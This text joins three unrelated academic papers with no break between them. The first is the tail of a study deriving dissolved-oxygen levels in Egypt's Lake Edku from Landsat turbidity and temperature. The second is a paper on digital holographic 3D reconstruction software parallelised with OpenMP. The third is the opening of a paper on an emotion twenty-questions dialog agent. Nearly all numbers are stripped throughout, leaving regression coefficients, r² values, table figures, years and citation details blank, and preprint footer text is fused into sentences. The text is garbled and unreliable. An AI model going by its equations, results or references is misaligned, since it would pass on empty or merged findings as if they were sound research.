c. developed algorithm model for do retrieval
optimal derivative capacity for do levels in lake edku, with the least input parameter requirements, and hence less processing work and cost, was found by using only turbidity and the natural logarithm of temperature. the developed algorithm model, stated in equation ( ), proved reasonable fitness with a regression coefficient of . (fig. ).

do = . + . turbidity - . ln (temperature)   ( )
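for illustration, the calibration and validation steps described here can be sketched with ordinary least squares in python/numpy; the turbidity, temperature and do values below are synthetic stand-ins rather than the field measurements, and the fitted coefficients will not match the (elided) published ones:

import numpy as np

# hypothetical ground-truth samples (turbidity in ntu, temperature in deg c,
# measured do in mg/l); illustrative values only, not the field data.
turbidity = np.array([12.0, 25.0, 40.0, 8.0, 55.0, 30.0])
temperature = np.array([18.0, 22.0, 27.0, 16.0, 29.0, 24.0])
do_observed = np.array([8.1, 6.9, 5.2, 8.8, 4.1, 6.0])

# design matrix for do = b0 + b1*turbidity + b2*ln(temperature)
X = np.column_stack([np.ones_like(turbidity), turbidity, np.log(temperature)])

# ordinary least squares fit (the calibration step)
coef, *_ = np.linalg.lstsq(X, do_observed, rcond=None)
b0, b1, b2 = coef

# apply the fitted model to a held-out sample (the validation step)
do_predicted = b0 + b1 * 20.0 + b2 * np.log(21.0)

# goodness of fit on the calibration set
residuals = do_observed - X @ coef
r2 = 1.0 - residuals.var() / do_observed.var()
print(f"do = {b0:.2f} + {b1:.3f}*turbidity + {b2:.2f}*ln(temperature), r2 = {r2:.2f}")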
the proposed algorithm was then applied to the second group of data reserved for testing, and the satellite-based derived do concentrations were compared with the corresponding field measurements. validation results proved acceptable predictive capacity of the developed algorithm model, with an r of . (fig. ). descriptive statistics for observed versus modeled yearly average do levels within lake edku are presented in table ( ). the developed model shows highly agreeable predictions with the field measurements. however, the model failed to represent the very low do concentrations occurring in the lake during the summer season.

figure . predictive capacity of the developed algorithm model for do satellite-based retrieval (observed versus predicted dissolved oxygen, mg/l; r² = . )
figure . validation of the developed model for do retrieval (observed versus predicted dissolved oxygen, mg/l; r² = . )

once validated, the developed model was applied to a set of landsat imageries to obtain the retrieved do spatial distribution in lake edku in time steps. figure illustrates a comparison of observed versus derived do concentrations during the four seasons in lake edku. for the purpose of demonstration, figure ( ) shows an example mapping of do concentrations throughout the lake zones in winter time.

table iv. descriptive statistics for observed versus derived yearly do levels (mg/l) within lake edku
mean: observed . , modeled .
minimum: observed . , modeled .
maximum: observed . , modeled .
standard deviation: observed . , modeled .

figure . observed versus derived do concentrations (mg/l) during four seasons in lake edku
figure . retrieved do concentrations in lake edku during winter season

iv. discussion
the main feature characterizing the edku lake system is the patchy pattern of water quality. the dissolved oxygen level ranges from less than mg/l, in extremely poor water conditions, to concentrations over mg/l. however, the exceedingly high do level, with a regional temperature range of - ºc in coastal lakes, is considered - % supersaturation and potentially signifies an unhealthy eutrophication condition (epa, ). in investigating do concentrations with reference to location within the lake, this case is clearly demonstrated in zone d of lake edku. very high do levels were noted, both in field measurements and in derived do concentrations, in zone d, which comprises entrapped waters with rare interaction. in reviewing this condition, it was found that the area experiences intensive unwarranted aquatic flora growth, and accordingly a high rate of photosynthetic oxygen production, which coincides with less active hydrodynamics and water exchange. on the other hand, zone a, which is the nearest to the major drainage inputs into the lake, has healthier do concentrations. this zone, while loaded with excessive pollutants, experiences inflowing water velocity along with a shallow water depth that allows partial compensation through a higher re-aeration rate. a moderate range of do concentrations exists mostly in zone b and zone c, with the combined effect of low temperature and suspended sediment concentrations, as well as slower flow dynamics in zone b and a localized tidal effect in zone c.
v. conclusions
developments and the consequent concerns about the beneficial capacity of water resources require continuous monitoring. field-based assessment of the quality state is usually faced with limitations in spatial coverage and frequency of sampling, as well as possible economic and accessibility obstacles. meanwhile, applications with remote sensing techniques have proved successful in the retrieval of water quality parameters, yet only for optically active ones that have directly-detectable spectral signals. this research study presents an approach for deriving a non-optically active property of water quality, dissolved oxygen (do), with reference to other space-based retrievable parameters that affect, and are affected by, do concentrations. the derivation methodology is based on the grounds of do modeling, as well as the regional conditions that define water quality in the coastal lakes of egypt. the selected ground truth data are distributed throughout the lake zones. furthermore, the data cover the four seasons so that a wide range of water quality levels experienced in the lake is reflected in the developed model. the study also presents results of a sensitivity analysis for alternate input combinations. consequently, the optimal do derivative algorithm model, with the best predictive capacity and least data requirement, was found. the developed optimal model comprises two satellite-based inputs, namely turbidity and temperature, for the edku coastal lake. with the acceptable predictive capacity achieved, the validated model facilitates regular assessment, with more frequent do mapping and possible tracking of historical changes. the spatial distribution of do concentrations reflects the patchy pattern within lake edku, with regard to interactions at the boundary as well as irregular flow dynamics within. the detected zonation nature calls for specific remedial measures that vary for each section. finally, remote sensing techniques have proved to have the potential to play more roles in monitoring processes and to offer valuable information for sustainability management. the approach illustrated in this study sheds light on the opportunity to expand applications with space-based earth observation products. the achieved promising results open the field for exploring more non-detectable water quality parameters that are interlinked with optically active properties in water. however, further applications with finer imageries and intensive ground truth data are recommended for relationships with higher accuracy.

references
[ ] abayazid, h., . assessment of temporal and spatial alteration in coastal lakes-egypt. in: proceedings of the eighteenth international water technology conference (iwtc ), sharm el sheikh, - mar, - .
[ ] abayazid, h., el-gamal, a., . employing remote sensing for water clarity monitoring in the nile delta coast. international water technology journal iwtj ( ), - .
[ ] akbar, t., hassan, q., achari, g., . a remote sensing based framework for predicting water quality of different source waters. international archives of the photogrammetry, remote sensing and spatial information sciences, part xxx.
[ ] bilge, f., yazici, b., dogeroglu, t., ayday, c., . statistical evaluation of remotely sensed data for water quality monitoring. international journal of remote sensing ( ), - .
[ ] brezonik, p., menken, k.d., bauer, m., . landsat-based remote sensing of lake water quality characteristics, including chlorophyll and colored dissolved organic matter (cdom). lake reserv. manag. , - .
[ ] brivio, p., giardino, c., zilioli, e., . determination of chlorophyll concentration changes in lake garda using an image-based reductive transfer code for landsat tm images. international journal of remote sensing ( ), - .
[ ] chapra, s.c., . surface water quality modeling. mcgraw-hill co. inc.
[ ] dona, c., sánchez, j.m., caselles, v., domínguez, j.a., camacho, a., . empirical relationships for monitoring water quality of lakes and reservoirs through multispectral images. ieee journal of selected topics in applied earth observations and remote sensing ( ), - .
[ ] dorji, p., fearns, p., . a quantitative comparison of total suspended sediment algorithms: a case study of the last decade for modis and landsat-based sensors. remote sens. , ; doi: . /rs .
[ ] environmental protection agency (epa), . guidance manual for compliance with the interim enhanced surface water treatment rule. united states, environmental protection agency, office of water ( ) publishing, epa- -r- - , p.
[ ] ganoe, r., deyoung, r., . remote sensing of dissolved oxygen and nitrogen in water using raman spectroscopy. the nasa scientific and technical information (sti), nasa center for aerospace information, nasa/tm- - .
[ ] gholizadeh, m.h., melesse, a.m., reddi, l., . a comprehensive review on water quality parameters estimation using remote sensing techniques. sensors ( ), ; doi: . /s .
[ ] giardino, c., bresciani, m., stroppiana, d., oggioni, a., morabito, g., . optical remote sensing of lakes: an overview on lake maggiore. j. limnol. (s ), - ; doi: . /jlimnol. . .
[ ] he, w., chen, s., liu, x., chen, j., . water quality monitoring in slightly-polluted inland water body through remote sensing - a case study in guanting reservoir, beijing, china. front. environ. sci. engin. china ( ), - ; doi . /s - - - .
[ ] hossen, h., negm, a., . sustainability of water bodies of edku lake, northwest of nile delta, egypt: rs/gis approach. procedia engineering , - .
[ ] kloiber, s.m., brezonik, p.l., bauer, m.e., . application of landsat imagery to regional-scale assessments of lake clarity. water res. ( ), - .
[ ] li, s., wu, q., wang, x., . correlations between reflectance spectra and contents of chlorophyll-a in chaohu lake. journal of lake sciences ( ), - .
[ ] okbah, m., abd el-halim, a., abu el-regal, m., nassar, m., . water quality assessment of lake edku using physicochemical and nutrients salts, egypt. chemistry research journal ( ), - .
[ ] siam, e., ghobrial, m., . pollution influence on bacterial abundance and chlorophyll-a concentration: case study at idku lagoon, egypt. scientia marina ( ), - .
[ ] sravanthi, n., ramana, i.v., yunusali, p., ashraf, m., ali, m.m., narayana, a.c., . an algorithm for estimating suspended sediment concentrations in the coastal waters of india using remotely sensed reflectance and its application to coastal environments. int. j. environ. res. ( ), - .
[ ] swain, r., sahoo, b., . improving river water quality monitoring using satellite data products and a genetic algorithm processing approach. sustainability of water quality and ecology ( - ), - .
[ ] thiemann, s., kaufmann, h., . determination of chlorophyll content and trophic state of lakes using field spectrometer and irs- c satellite data in the mecklenburg lake district - germany. remote sensing of environment , - .
[ ] united nations educational, scientific and cultural organization (unesco), .
water resources systems planning and management. isbn - - - , © unesco, - .
[ ] united states geological survey (usgs), earth resources observation and science (eros) center, . landsat (l ) data users' handbook, version . , lsds- .
[ ] zhang, y.z., . application of an empirical neural network to surface water quality estimation in the gulf of finland using combined optical data and microwave data. remote sensing of environment ( ), - .

international conference on sensor network and computer engineering (icsnce )

research on digital holographic 3d reconstruction software

ma jing
school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china
e-mail: majing_majing@qq.com

fu yanfang, tian penghui
school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china

abstract—digital holography has a wide range of applications in displaying the surface morphology of three-dimensional objects. there have been many studies on the physical methods and implementation methods of digital holography. one of the main problems at present is to design stable and fast reconstruction software. this paper analyzes the basic principle of convolution-based off-axis digital holographic reconstruction and presents the process of 3d reconstruction of off-axis digital holography. the 3d reconstruction software of digital holography is designed and developed according to the basic principle and the process of reconstruction, and the parallel operation of 3d reconstruction is realized by openmp. results show that the software can help researchers conveniently realize digital holographic three-dimensional reconstruction. the reconstruction parameters can be adjusted according to the requirements, and the spectra, intensity maps, phase maps and other information required in the reconstruction process can be obtained. the software meets the needs of digital three-dimensional reconstruction.

keywords-digital holography; three-dimensional reconstruction; parallel computing; software design

i. introduction
digital holography has wide application prospects in the fields of three-dimensional surface deformation measurement [ ], particle field testing [ ], flow field measurement [ ], and biological sample microscopic measurement [ - ]. at present, a lot of research on the algorithms and applications of digital holography has been carried out. in the early stage, the single fourier transform algorithm was widely used, and this algorithm can reproduce the pixel size and the reproduction distance. more recently, many improvements based on the fast fourier transform have been made to the convolution, angular spectrum and fresnel methods, as well as to phase unwrapping and numerical compensation [ - ]. in order to carry out the required reconstruction in digital holography research conveniently and quickly, this paper designs and develops a digital holographic 3d reconstruction software based on the reconstruction principle used in 3d reconstruction of digital holography and according to the reconstruction process.

ii. reconstruction principle
the principle of digital holography is the same as that of traditional optical holography. it is divided into the recording and reproducing processes of the object light wave, which are realized by the interference and diffraction principles of light. digital holographic reconstruction is to process the digital hologram to obtain the object information.
for off-axis holography, we need to record the object information in the form of interference fringes using an off-axis physical optical path, and use the interference principle to record the object information in the form of an image through a ccd camera to form a hologram. according to the different measurement objects and recording conditions, digital holographic methods mainly include the convolutional reconstruction algorithm and the fresnel diffraction integral reconstruction algorithm. the software uses a convolution method. according to convolution theory, the complex amplitude of the object light, u(x, y), can be expressed by the following formula in terms of the intensity of the interference fringes, the intensity of the reference light, and the impulse response function:

u(x, y) = f^{-1}{ f[ h(x, y) c(x, y) ] f[ h(x, y, x', y') ] }   ( )

in the formula, h(x, y) is the hologram, c(x, y) is the reference light, and h(x, y, x', y') is the impulse response function, which is related to the specific physical optical path. it is calculated as follows:

h(x, y, x', y') = exp( jk sqrt( z^2 + (x - x')^2 + (y - y')^2 ) ) / [ jλ sqrt( z^2 + (x - x')^2 + (y - y')^2 ) ]   ( )

in the formula, λ is the wavelength. the block diagram of the convolution algorithm is shown in figure : the hologram h(x, y) is multiplied by the reference light c(x, y), fourier transformed, multiplied by the fourier transform of the impulse response, and inverse fourier transformed to obtain u(x, y).

figure . block diagram of the convolution method

the complex amplitude of the object light can be obtained by the above method. the complex amplitude of the object light carries the three-dimensional information of the object. if the object fluctuates beyond the wavelength range, the phase needs to be unwrapped to extract the three-dimensional distribution information of the object. in the process of digital holographic reconstruction, there are usually three ways: ( ) the fresnel transform diffraction method, ( ) the fourier transform filter method, and ( ) the fresnel wavelet transform method. the software uses method ( ). the fourier transform filter method applies the fourier transform directly to the digital hologram, then removes the zero-order spectrum and the conjugate spectrum in the fourier domain using filtering, frequency shifting and other operations, and then applies the inverse fourier transform.

phase unwrapping is an important part of 3d reconstruction in digital holography. the minimum norm method is a class of algorithms widely used at present, of which there are four typical variants: ( ) the least squares method based on the fast fourier transform, ( ) the least squares method based on the discrete cosine transform, ( ) the least squares method based on transverse shear interference, and ( ) the preconditioned conjugate gradient method. the software uses method ( ) to unwrap the phase diagram. the basic steps of the least squares method based on the fast fourier transform are as follows:
( ) extend the wrapped phase φ(i, j) by even periodic extension;
( ) calculate ρ(i, j) = [ δx(i, j) - δx(i-1, j) ] + [ δy(i, j) - δy(i, j-1) ], where δx(i, j) = φ(i+1, j) - φ(i, j) and δy(i, j) = φ(i, j+1) - φ(i, j) are the wrapped phase differences;
( ) perform a two-dimensional fft on ρ(i, j) to get p̂(i, j);
( ) compute f̂(i, j) = p̂(i, j) / [ 2 cos(π i / m) + 2 cos(π j / n) - 4 ];
( ) perform the two-dimensional inverse fft on f̂(i, j) to obtain the true phase value φ̂(i, j) after the period extension, and take φ(i, j) = φ̂(i, j).
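as a rough illustration of this section, the following python/numpy sketch strings together the convolution reconstruction of equation ( ) and a least-squares phase unwrapping step. the dct call stands in for the even periodic extension plus fft described above, numpy and scipy are assumed to be available, and the wavelength, pixel size and distance in the usage comment are placeholders rather than the paper's values:

import numpy as np
from scipy.fft import dctn, idctn

def reconstruct_convolution(hologram, reference, wavelength, pixel_size, distance):
    """u(x, y) = ifft2( fft2(hologram * reference) * fft2(impulse_response) )."""
    ny, nx = hologram.shape
    k = 2.0 * np.pi / wavelength
    x = (np.arange(nx) - nx / 2.0) * pixel_size
    y = (np.arange(ny) - ny / 2.0) * pixel_size
    xx, yy = np.meshgrid(x, y)
    r = np.sqrt(distance ** 2 + xx ** 2 + yy ** 2)
    impulse = np.exp(1j * k * r) / (1j * wavelength * r)      # impulse response of eq. ( )
    spectrum = np.fft.fft2(hologram * reference)
    u = np.fft.ifft2(spectrum * np.fft.fft2(np.fft.ifftshift(impulse)))
    return u, np.abs(u) ** 2, np.angle(u)                     # field, intensity, wrapped phase

def unwrap_phase_least_squares(wrapped):
    """unweighted least-squares unwrapping; the dct plays the role of the
    even periodic extension plus fft described in the text."""
    m, n = wrapped.shape
    wrap = lambda p: (p + np.pi) % (2.0 * np.pi) - np.pi
    dx = np.zeros_like(wrapped)
    dy = np.zeros_like(wrapped)
    dx[:-1, :] = wrap(np.diff(wrapped, axis=0))
    dy[:, :-1] = wrap(np.diff(wrapped, axis=1))
    # rho(i, j) = (dx(i, j) - dx(i-1, j)) + (dy(i, j) - dy(i, j-1))
    rho = dx.copy()
    rho[1:, :] -= dx[:-1, :]
    rho += dy
    rho[:, 1:] -= dy[:, :-1]
    # solve the discrete poisson equation in the transform domain
    i = np.arange(m).reshape(-1, 1)
    j = np.arange(n).reshape(1, -1)
    denom = 2.0 * np.cos(np.pi * i / m) + 2.0 * np.cos(np.pi * j / n) - 4.0
    denom[0, 0] = 1.0                   # dc term: the phase is defined up to a constant
    phi_hat = dctn(rho, norm="ortho") / denom
    phi_hat[0, 0] = 0.0
    return idctn(phi_hat, norm="ortho")

# illustrative parameters only (not the values used in the paper):
# u, intensity, phase = reconstruct_convolution(hologram, np.ones_like(hologram),
#                                               wavelength=632.8e-9, pixel_size=4.65e-6,
#                                               distance=0.15)
# elevation_phase = unwrap_phase_least_squares(phase)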
iii. software design

a. reconstruction process
the reconstruction process of the digital holographic reconstruction software is shown in figure . the object of digital holographic processing is the hologram collected by the reconstruction hardware system. according to the different components of the reconstruction hardware system, the hologram first needs to be multiplied by the reference light; for the case of a plane reference light, this step can be omitted. after the spectrum is obtained, the spectral distribution of the object information is found near the positive and negative first-order centres, while the strongest term at the image centre, the zero order, contains no object information. therefore, frequency selection and frequency shifting are needed. frequency selection chooses the positive or negative first-order spectrum area, and the frequency shift moves the positive or negative first-order spectrum centre to the image centre. according to the needs of reconstructing the hologram, the spectrum is processed with a frequency shift. besides moving the frequency spectrum to the centre, which makes the image frequency distribution clearly visible, there is another advantage: it can separate the periodic interference signals. after the frequency-shifted image is obtained, the transfer function is multiplied with the frequency-shifted image, and the product of the two is inverse fourier transformed. the inverse transform image is a complex image whose phase contains the information of the object; this wrapped phase needs to be unwrapped.

figure . digital holographic 3d reconstruction process (hologram multiplied by reference light, fourier transform, spectrum diagram, frequency selection and shift, multiplication by the transfer function, inverse fourier transform, complex function diagram, phase diagram, unwrapping, unwrapped phase diagram, linear transformation, object elevation data)

after unwrapping, the phase represents the actual object elevation, and the height information of the object can be obtained according to the calibration value. the reconstruction algorithm of three-dimensional digital holography is a complicated and time-consuming process. in addition, during reconstruction the user is generally required to select the appropriate spectrum area and to set reconstruction parameters such as the reconstruction distance and wavelength. therefore, the software design adopts a multi-threaded approach: the work interface uses an interface thread, and the reconstruction algorithm runs in worker threads.

b. parallel processing algorithm
in the process of 3d reconstruction of digital holography, a lot of image processing is needed. a parallel processing algorithm is needed to improve the speed of operation, so as to improve the real-time performance of 3d reconstruction of digital holography. this paper uses openmp technology to realize parallel operation. openmp is led by the openmp architecture review board and is widely accepted. it is a set of compiler directives for multi-threaded programming on shared-memory parallel systems. because the reconstruction of each digital hologram requires sequential execution, the different stages of the reconstruction process cannot be run in parallel; only the task within each stage can be processed in parallel. from the processing flow, it can be seen that the sub-tasks are basically the processing of complex or real images.
therefore, this paper uses the parallel processing method for the loop operations, and only needs to add the following openmp compilation directive before the for statement which needs parallel operation:

#pragma omp parallel for schedule(kind, [size])

here kind represents a scheduling pattern, and there are three patterns in all: static, dynamic and guided. the static mode allocates size loop iterations to each thread, completing the allotment according to the number of threads; if the size value is too large, some cores may carry heavy tasks while other cores have no task. in dynamic mode, blocks of size iterations are also assigned to the cores, but the allocation process is dynamic: whichever core is idle is given the next block of size iterations. in guided mode, each core is assigned tasks in descending order, allocating larger blocks first and then gradually reducing them, down to a minimum block of size iterations. if no size is specified, a default value is used in all the above modes. in order to measure the running speed of the parallel algorithm and of the various parallel operation modes, the running time of the software was tested on a desktop equipped with an amd phenom ii x t six-core processor. the resolution of the hologram is x . the reconstruction of the holograms was repeated during the test, and the mean and variance of the reconstruction time were calculated, as shown in table .

table i. reconstruction time for different parallel modes (parallel mode; mean time; variance)
none; . ; .
static, ; . ; .
dynamic, ; . ; .
guided, ; . ; .
static, ; . ; .
dynamic, ; . ; .
guided, ; . ; .

from the above test results, we can see that when the parallel processing algorithm is not adopted, the average time of each reconstruction is . s, which is about . times that of the parallel algorithm. for the different parallel algorithm patterns, the average reconstruction time is almost the same and the variance shows only small differences.

iv. processing results
based on the above reconstruction algorithm, the 3d reconstruction software of digital holography was developed using the c++ language. in order to verify the effect of the software, several holograms were reconstructed. as shown in figure , the main parameters of the microlens array hologram are as follows: wavelength ( nm), pixel size ( . um), sample refractive index ( . ), reconstruction distance ( mm).

figure . microlens array hologram

the reconstruction of the hologram is based on the above reconstruction parameters, and the result of the reconstruction is shown in figure .

figure . reconstructed image of microlens array

figure shows a hologram of a cross object with a wavelength of . nm, a pixel size of . um, and a reconstruction distance of . mm.

figure . cross structure hologram

the reconstructed 3d image is shown in figure .

figure . cross structure reconstructed image

the 3d reconstruction software of digital holography can not only display the 3d reconstruction map, but also display the original phase map, frequency spectrum, intensity map, phase map and 3d reconstruction map according to the requirements. users can set reconstruction parameters according to their needs, select the positive or negative first-order centre and the reconstructed area in the spectrum, and the reconstruction results and process data can be saved as images or data files. the software interface is shown in figure .

figure . software interface
v. conclusion
this paper analyzes the basic principle of the reconstruction of off-axis digital holography based on convolution. according to this principle, the 3d reconstruction process of off-axis digital holography is given, and the 3d reconstruction software of digital holography is designed and developed. in order to improve the running speed of 3d reconstruction, the parallel operation of 3d reconstruction is realized by using openmp technology. the various implementations of openmp parallel computing were analyzed comparatively. the results show that the average reconstruction time is basically the same for the various parallel modes, but the variance of the guided mode is relatively smaller. finally, some holograms were reconstructed using this software. the results show that the software can fulfil the requirements of 3d reconstruction of digital holography and has good practicability. it provides the functional integration needed in digital holography reconstruction and facilitates the process of digital holography.

acknowledgments
the work described in this paper was fully supported by the special scientific research project of shaanxi provincial education department ( jk ), the shaanxi province new network and testing and control engineering laboratory project, and the state and provincial joint engineering laboratory of advanced network and monitoring control (anmc) fund project (gsysj ).

references
[ ] kim myung k, parshall daniel. phase imaging digital holography for biological microscopy. proc of spie, , : ~ .
[ ] c. b. lefebvre, s. coëtmellec, d. lebrun, et al. application of wavelet transform to hologram analysis: three dimensional location of particles[j]. opt. laser eng., , ( ): - .
[ ] j. desse, p. picart, p. tankam. digital three-color holographic interferometry for flow analysis[j]. opt. express, , ( ): - .
[ ] m.k. kim. application of digital holography in biomedical microscopy. j. opt. soc. korea, , ( ): - .
[ ] u. schnars and w. juptner. digital recording and numerical reconstruction of holograms. meas. sci. technol., , : r - r .
[ ] zhang yi zhuo, wang da yong, zhao jie, wan yu hong, jiang zhu qing, tao shi quan. research on practical phase unwrapping algorithm in digital holography [j]. journal of optics, , ( ): - .
[ ] zhang zhi hui, wang hua ying, liu zuo qiang, huang min, liu fei fei, yu meng jie, zhao bao qun. phase unwrapping algorithms based on fast fourier transform. laser & optoelectronics progress, , ( ): - .
a socratic epistemology for verbal emotional intelligence

abe kazemzadeh, james gibson, panayiotis georgiou, sungbok lee, shrikanth narayanan
signal analysis and interpretation laboratory, university of southern california, los angeles, usa

abstract
we describe and experimentally validate a question-asking framework for machine-learned linguistic knowledge about human emotions. using the socratic method as a theoretical inspiration, we develop an experimental method and computational model for computers to learn subjective information about emotions by playing emotion twenty questions (emo q), a game of twenty questions limited to words denoting emotions.
this paper was inspired by reflecting on how humans justify their beliefs about emotions. this reflection led to a experimental method for collecting human knowledge about emotions and a computational model that uses the collected knowledge in an automated dialog agent. the logician charles s. peirce identified three types of thought processes by which a person can justify their beliefs and thereby acquire knowledge: induction, deduction, and hypothesis (peirce, ). whereas email addresses: abe.kazemzadeh@gmail.com (abe kazemzadeh), jjgibson@usc.edu (james gibson), georgiou@sipi.usc.edu (panayiotis georgiou), sungbokl@usc.edu (sungbok lee), shri@sipi.usc.edu (shrikanth narayanan) peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts induction is primarily involved with observational data, deduction and hypothesis have a linguistic, propo- sitional component. the third of these, hypothesis (also known as abduction (eco and sebeok, )), has been compared with the socratic method of questioning-asking dialogs (hintikka, ). the socratic method was named after the ancient greek philosopher socrates who applied his method of inquiry to examine concepts that seem to lack any concrete definition, in particular some of the complex moral and psychological concepts of his time like “justice”, “knowledge”, “piety”, “temperance”, and “love”. we claim that this method of inquiry can shed light on how people justify beliefs about emotional concepts, which also seem to defy concrete definition. question-asking allows people to learn about things without directly experiencing them. since a computer agent cannot directly experience emotions as a human would, question-asking can be leveraged for the computer agent to learn about emotional concepts. question-asking has also been proposed as a stage in child development resposible for rapid learning and language acquisition (frazier et al., ). likewise, a computer agent can use question-asking to acquire knowledge and vocabulary. we call the approach of using question-asking to interactivly acquire linguistic knowledge about emotion by a computer dialog agent a socratic epistemology for verbal emotional intelligence. the knowledge acquired by the socratic epistomology for verbal emotional intelligence is an informal, social type of knowledge. this informal knowledge about emotions is important because although there has been much recent progress toward understanding the underlying biological basis for emotion, humans have been able to understand emotions informally since ancient times. we call this informal, language-based understanding of emotions natural language description of emotion (kazemzadeh, ). natural language descriptions of emotion are utterances that refer to emotions, as opposed to utterances that express emotions. this phenomenon can be seen as a specific subset of the larger phenomenon of emotional language, which also includes emotion or sentiment expressed towards some object, vocal modulation due to emotion, and persuasion and pragmatics. studying language that deals with referential statements about emotions is a novel focus that is distinct from the prevailing trends of studying the expressive characteristics of emotional language. the framework we present also differs from other computational theories of emotion in that it aims to study how people describe emotions, rather than how emotions should be described. 
as such, it can be seen as a descriptive, rather than prescriptive, theory, and hence has commonalities with sociological studies of emotions (king, ; shaver et al., ; mihalcea and liu, ; kamvar and harris, ; kazemzadeh et al., ) and crowd-sourcing. although there is clearly a biological basis for emotions, the way that people describe emotions in natural language varies over time from culture to culture and person to person. a descriptive theory of how people describe emotions in natural language should reflect this variation. thus, a particular instantiation of a theory of natural language description of emotion should be relative to a peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts particular agent or set of agents at a given time who hold similar beliefs and communicate using the same language. rather than trying to establish a single, particular definition for emotion words, we study how shared meaning can be established through natural language dialog behavior even when people and agents may have different ways of experiencing and their describing emotions. the key goals of this paper are to use question-asking to observe natural language descriptions of emotion in the context of interactive dialogs and to computationally model the communicative behavior that supports the referential link between language and emotions. to do this, we use an experimental game called emotion twenty questions (emo q). emo q is played like the traditional game of twenty questions, except that one player, the answerer, must choose a word that names an emotion. the other player, the questioner, must try to guess the emotion that the answerer picked by posing a series of twenty or fewer questions. importantly, we do not restrict the set of emotion words that the players can choose nor the questions they can ask: the set of emotion words and questions is not limited except by the players’ judgment and cooperation. an example of a human-computer emo q game is given below: agent: let me know when you have picked an emotion word. user: ok agent: is it very intense? user: no agent: is it positive? user: yes agent: is it an emotion that just pops up spontaneously (vs being triggered by something)? user: depends agent: is it caused by anything in particular user: well, yes, you need the right conditions agent: is it relaxation? user: yes agent: so did i get it right? user: yes, you got it. agent: awesome! would you like to play again? user: no, thanks. agent: thank you for playing the data from the human-human emo q games allows us to observe what words people consider to denote emotions, what questions people ask about emotions, what factors determine the length of question/answer exchanges, and what is the probability that the emotion words will be correctly guessed. these results are used to create the computer agent and test its performance with respect to human performance. for the peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts automated agent presented in this paper, we focused on the case where the computer agent plays the role of the questioner while future work for an answerer agent is discussed in section . the paper is organized as follows. section discusses the motivations and theory behind our work. section describes the computational model and algorithm we used to create an emo q questioner agent. 
section discusses experiments we conducted of humans and computers playing emo q. section describes the results of testing the agent. finally section and section propose future work and provide discussion and links to open source software implementations. . background . . natural language descriptions of emotions just as memory addresses, variables, and urls refer to electronic resources for computers, so do words and descriptions identify objects, both physical and conceptual, for humans. when processing natural language by computer, it can help to draw upon these similarities. this is especially helpful in the case of affective computing, when the objects we wish to refer to, emotions, are abstract and subjective. in this paper we make a distinction between the emotion expressed by the speaker and the emotion referred to by the speaker. currently there has been a great degree of interest in automatically analyzing emotional expression in language. the goal of such analysis is to determine emotions expressed by the speaker or writer, i.e., the emotions that the speaker currently feels. the language used as input to this kind of analysis can be a speech recording or textual representation of language. however, automatically analyzing the emotions expressed in an utterance or document is problematic when a speaker refers to emotions that are not his or her own current emotions. some examples of this include quotations, storytelling/gossip, counterfactual reasoning, post facto emotional self-report, and abstract references to emotions. he said that he was mad. (quotation) did you see how mad john was? (gossip) if you eat my ice cream, i will get mad. (counterfactual) i was mad when my car got stolen last year. (self-report) anger is one of the seven sins. (abstract reference). in these examples, a naïve automated analysis would detect anger, but in fact the writer of these sentences is not actually feeling anger at the current time. in many cases, such as task-driven dialogs like ordering airline tickets from an automated call center, this distinction might not be pertinent. however, for open-ended dialog systems the distinction between expression and reference of emotions could be relevant, for example an automated agent for post-traumatic stress disorder therapy. the study of natural language descriptions of emotions brings the distinction between emotion expression and reference into focus. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts the ability to talk about things beyond the here-and-now has been termed displacement (hockett and altmann, ). displacement is an important characteristic that distinguishes human language from animal communication. in the context of this research, the ability talk about an emotion without it being physically present is a key component of natural language description of emotion. natural language description of emotion has been examined in ethnography, comparative linguistics, and cognitive science and it is beginning to be studied in the domain of natural langauge processing (king, ; zoltán kövecses, ; rolls, ; kazemzadeh et al., ). at the most basic level, natural language description of emotion includes words that name emotions, e.g. angry, happiness, etc. however, due to the productive, generative nature of natural language, it is possible to refine and generalize emotion descriptions with longer natural language phrases. 
in order to communicate using natural language descriptions of emotions, people must be able to come to a shared understanding about the meaning of these descriptions. russell ( ) introduced the notion of definite descriptions, a logical device to used to model unique reference in the semantics of languages, both formal and natural. in this paper, we focus on the natural language definite descriptions. common examples of natural language definite descriptions are proper names and noun phrases with the definite article “the”. indefinite descriptions, on the contrary, are prefaced with indefinite articles, such as “a”, “some”, or “every”. we maintain that natural language descriptions of emotions are definite descriptions when they are used in natural language interaction that terminates in mutual agreement. by considering terms that refer to emotions as definite descriptions, we are trying to capture the intuition that different people mean the same things when they use the same emotion terms. in barrett ( ), the question is posed of whether emotions are natural kind terms, to which the paper answered no, i.e., that emotion words in general represent non-unique classes of human behavior rather than fundamentally distinct biological classes. the question of whether emotion terms are definite descriptions can be seen as a less stringent criterion than that of whether they are natural kinds. in this paper, we apply the notion of definite descriptions to capture the experimental data which indicates that there is a high degree of consensus about how emotions are described when measured by successful outcomes in human-human emo q. . . emo q, crowd-sourcing, and experimental design the game of emo q was designed as a way to elicit natural language descriptions of emotion. posing the experiment as a game leverages past results in crowd-sourcing and games with a purpose. from the perspective of natural language processing, the emo q game can be seen as a wizard of oz experiment that collects human behavior to train the behavior of an automated agent. games like emo q can be seen as games with a purpose (von ahn and dabbish, ) whose purpose is crowd-sourcing (howe, ) the collective knowledge and beliefs of the players (kazemzadeh et al., ). the phenomenon of crowd-sourcing is closely tied to the emergent properties of online social communities (zhong et al., ). peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts by relying on the wisdom of the masses, we venture a simple answer to the difficult question, “what is emotion?”. the answer, according to crowd-sourcing, is that emotion is what people say it is. although this answer side-steps many important issues, such as physiological and psychological descriptions of emotions, it does bring other issues into sharper focus. there has been a trend toward studying non-prototypical emotional data (mower et al., ). non-prototypical emotional data is exemplified by disagreement among annotators when assigning emotional labels to data. we argue that our methodology provides a crowd- sourced description of emotions that can effectively deal with non-prototypical emotions. 
